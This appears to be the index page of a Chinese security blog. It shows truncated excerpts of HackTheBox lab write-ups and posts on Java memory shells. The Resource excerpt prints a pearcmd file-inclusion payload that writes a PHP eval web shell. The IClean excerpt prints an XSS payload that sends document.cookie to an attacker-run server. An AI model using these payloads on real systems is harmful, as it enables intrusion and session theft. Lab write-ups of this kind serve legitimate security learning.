心流 - Still mind runs deep.

谁家逆天代码😡 [图片]连通了两个宵，搭了几个小网站玩玩。Alist终于又搭起来了🥱在家里天天熬大夜，过上美国时间了💀当家乡入冬的时候列车到站以后小时候的风再吹过逆天长城杯，还好进了，题目难度不一样按照排序也不加权😓，还好进了，虽然是倒数前十名。太美丽了广州，还好玩了，不玩后悔一辈子，有机会还去。✌ [图片]终于让我干进决赛了！你们学的这么快，真的是人吗？

Java内存马之Tomcat Valve & Upgrade & Executor

CTF

JavaSec

未读

Java内存马之Tomcat Valve & Upgrade & Executor

发表于2024-08-122024-08-11 Java内存马开发

Tomcat Valve什么是 Valve 和 Pipeline Tomcat中容器的pipeline机制 - coldridgeValley - 博客园没错，V 社中的 V 就是 Valve 的缩写（阀），因此 steam （蒸汽）这个意思就很明确了 XD 在 Tomcat 中，Pipeline和 Valve是其处理请求的重要概念。 Pipeline 是一系列 Valve 的有序集合。它类似于一个处理请求的流水线，每个 Valve 都代表一个处理步骤。 Valve 是 Pipeline 中的处理单元，负责执行特定的任务，例如身份验证、访问控制、日志记录、请求过滤等。而 Tomcat 由 Connector 和 Container组成，请求由 Connector 包装为 Request 后交 Container 处理，第一层是 Engine 容器。Engine 不直接调用 Host 处理请求，而是通过 Pipeline 组件。Container 有 4 种：Engine、Host、Context、Wrapper，相互包含。4 种容器都有 Pipeline 组件，每个 P ...

Penetration

Range

未读

HacktheBox-Resource

发表于2024-08-092024-08-10 WriteUp HackTheBox

Season 6 Week 1 晚上睡不着觉，打一发。这 tm 是中等？信息搜集fscan 一把嗦 123456start infoscan10.10.11.27:80 open10.10.11.27:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.27 code:302 len:154 title:302 Found 跳转url: http://itrc.ssg.htb/ 扫到三级域名，添加hosts。 pearcmd上来看指纹是个 php，有文件上传，打半天没打动，后面一查 wp 用 pearcmd，因为是 tp。 1/?page=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=eval($_REQUEST[1]);?>+/var/www/itrc/uploads/shell.php 然后访问上传地 ...

Penetration

Range

未读

HacktheBox-Lame 两种线路

发表于2024-08-072024-08-10 WriteUp HackTheBox

0xdf hacks stuff 这个有个什么 Guided Mode，好像是有流程的，学习下思路。这次复现了两条线路。 FTP + SMBTask 1 How many of the nmap top 1000 TCP ports are open on the remote host? nmap 不指定时默认就是 top 1000 端口。或者可以使用--top-ports X来指定 1nmap -sT 10.10.10.3 Task 2 What version of VSFTPd is running on Lame? 需要使用 nmap 扫描详细信息： 12345678910111213141516171819202122232425262728293031323334353637383940nmap -Pn -sVC -p21,22,139,445 -oN namp.txt 10.10.10.3PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.3.4| ftp-syst: | ...

Penetration

Range

未读

HacktheBox-PermX

发表于2024-08-062024-08-10 WriteUp HackTheBox

信息搜集只有 22 和 80 端口开放。 123456start infoscan10.10.11.23:22 open10.10.11.23:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.23 code:302 len:277 title:302 Found 跳转url: http://permx.htb 添加下hosts文件。目录扫描1gobuster dir -u http://permx.htb/ -w /usr/share/wordlists/dirb/common.txt 有文件泄露，http://permx.htb/lib/实际查看发现都是一些 css 和 js 文件。php 文件页没有什么帮助。子域名扫描1gobuster vhost -u http://permx.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million ...

NodeJs

未读

Safe-transfer 一个安全的第三方链接中转

发表于2024-08-052024-08-04 脚本 Shortcut

前言这几天真是忙烂了，交接加上项目再加上各种活，各种东西做起来也贼吃力，感觉怎么活得这么累捏？编写原因这几年能注意到越来越多的网站平台都会自家的产品中添加了一个安全跳转的页面。比如 QQ 的未认证的页面。我看到一些博主用上了单独开一个 safe.html ，但实际上这样还是在同一域名下操作，还是会降低主域名的 SEO。所以这个推荐挂载在其他域名下面，比如我的 safe-trans.natro92.fun。本来觉得代码量也就 100 多行两小时就写完了，调了一下午。感觉也是无敌了，修修改改，又出来一座史山。💩也不多说了，如果有相同需求的自己拉一下就好了。中间跳转页面的前端部分参考了一些其他的优秀代码，前端的代码在下面，如果喜欢的欢迎给一个 star。中转页前端部分：GitHub - natro92/safe-transfer: 一个中转页面hexo 后端检测部分： hexo-safe-transferGitHub - natro92/hexo-safe-transfer: Add a safe transfer page to facilitate third ...

Penetration

Range

未读

HacktheBox-BoardLight

发表于2024-08-042024-08-04 WriteUp HackTheBox

信息搜集123456start infoscan10.10.11.11:80 open10.10.11.11:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.11 code:200 len:15949 title:None 只有一个 80 入口。扫下目录： 1234567891011121314151617181920212223242526272829303132gobuster dir -u http://10.10.11.11/ -w /usr/share/wordlists/dirb/common.txt -x php===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)================================== ...

Penetration

Range

未读

HacktheBox-Compiled

发表于2024-08-032024-08-04 WriteUp HackTheBox

这个后半部分提权确实有点费劲，主要没有编译环境，后面来回装了几次。信息搜集先扫下 1fscan -h 10.10.11.26 -np -p 1-65535 1234567891011121314start infoscan10.10.11.26:110 open10.10.11.26:25 open10.10.11.26:3000 open10.10.11.26:5000 open10.10.11.26:5985 open10.10.11.26:7680 open[*] alive ports len is: 6start vulscan[*] WebTitle: http://10.10.11.26:5985 code:404 len:315 title:Not Found[*] WebTitle: http://10.10.11.26:5000 code:200 len:5234 title:Compiled - Code Compiling Services[*] WebTitle: http://10.10.11.26:3000 code:200 le ...

CTF

JavaSec

未读

Java内存马之WebFlux基础知识补充

发表于2024-08-022024-08-04 Java内存马开发

Spring WebFlux 一文弄懂 Spring WebFlux 的来龙去脉 Spring WebFlux是Spring Framework 5.0中引入的一个新的响应式框架，旨在为在Spring中构建响应式应用程序提供支持。Spring WebFlux基于Reactor项目，是一个异步、非阻塞的框架，专门用于处理并发性较高且需要非阻塞I/O操作的应用程序，例如实时数据处理、高性能API服务等。与传统的Spring MVC不同，WebFlux旨在充分利用多核心和现代硬件的优势，提高应用程序的吞吐量和伸缩性。该框架队接口的返回类型进行控制，使用Mono<T>和Flux<T>，这里简单介绍一下什么是Mono和Flux 什么是 MonoMono代表的是一个或零个元素的异步序列。你可以将其视作响应式编程中的Future或Optional，但提供了更丰富的操作和组合性。Mono是用来处理异步任务的，尤其是那些最多只返回单个值的操作，例如一个数据库查询可能返回零个或一个结果。 12Mono<String> noData = Mono.empty( ...

Penetration

Range

未读

HacktheBox-IClean

发表于2024-08-022024-08-04 WriteUp HackTheBox

信息搜集12345678start infoscan(icmp) Target 10.10.11.12 is alive[*] Icmp alive hosts len is: 110.10.11.12:22 open10.10.11.12:80 open[*] alive ports len is: 2start vulscan[*] WebTitle: http://10.10.11.12 code:200 len:274 title:None 添加 host。 XSShttp://capiclean.htb/quote，quote 路由可以进行发送邮件。将 service 参数修改为 XSS 内容。启动一个 http 服务方便接收内容。 1python -m http.server 9292 然后用 XXS 接收内容。 1service=<img src=x onerror=fetch("http://10.10.14.62:9292/"+document.cookie);>&email=natro92@na ...

Penetration

Range

未读

HacktheBox-GreenHorn

发表于2024-08-012024-08-04 WriteUp HackTheBox

信息搜集1fscan -h 10.10.11.25 123456789101112start infoscan(icmp) Target 10.10.11.25 is alive[*] Icmp alive hosts len is: 110.10.11.25:22 open10.10.11.25:80 open10.10.11.25:3000 open[*] alive ports len is: 3start vulscan[*] WebTitle: http://10.10.11.25 code:302 len:154 title:302 Found 跳转url: http://greenhorn.htb/[*] WebTitle: http://10.10.11.25:3000 code:200 len:13904 title:GreenHorn[+] InfoScan:http://10.10.11.25:3000 [Gitea简易Git服务][*] WebTitle: http://greenhorn.htb/?file=welcom ...

Natro92